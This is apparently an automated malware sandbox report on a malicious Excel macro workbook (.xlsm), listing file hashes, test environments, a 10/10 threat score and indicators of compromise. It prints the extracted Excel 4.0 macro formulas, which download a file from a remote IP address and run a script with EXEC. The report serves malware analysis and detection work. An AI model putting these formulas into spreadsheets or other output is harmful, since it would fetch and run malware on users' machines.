General
-
Target
19c84a9cfa16e5463eee731e3a87fd7c
-
Size
6KB
-
Sample
231221-2p8j6sfbbj
-
MD5
19c84a9cfa16e5463eee731e3a87fd7c
-
SHA1
a8a1a00dc113b2ac710a79964273d5ef8aef5c52
-
SHA256
819f4c1bc8e888aaece6fc9843699834b65c11c1dc96b556b0d5adf0a87498a4
-
SHA512
e15e212aa3a11e3b37d5106bf352fad2815b9e964b941b57a073bd09ae717f672a1df920d42f78de5cd7898bc3eced58b5d17ff2bac7a94da8f8c8ec45a38813
-
SSDEEP
192:NDSBuSvbrA2OmmfRW8UhHFBFYuwb98ycB3cg+DPaQ+Vgm+ngJwx:NGugM2wg1FYtb98yhz
Static task
static1
Behavioral task
behavioral1
Sample
19c84a9cfa16e5463eee731e3a87fd7c.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
19c84a9cfa16e5463eee731e3a87fd7c.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
19c84a9cfa16e5463eee731e3a87fd7c
-
Size
6KB
-
MD5
19c84a9cfa16e5463eee731e3a87fd7c
-
SHA1
a8a1a00dc113b2ac710a79964273d5ef8aef5c52
-
SHA256
819f4c1bc8e888aaece6fc9843699834b65c11c1dc96b556b0d5adf0a87498a4
-
SHA512
e15e212aa3a11e3b37d5106bf352fad2815b9e964b941b57a073bd09ae717f672a1df920d42f78de5cd7898bc3eced58b5d17ff2bac7a94da8f8c8ec45a38813
-
SSDEEP
192:NDSBuSvbrA2OmmfRW8UhHFBFYuwb98ycB3cg+DPaQ+Vgm+ngJwx:NGugM2wg1FYtb98yhz
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-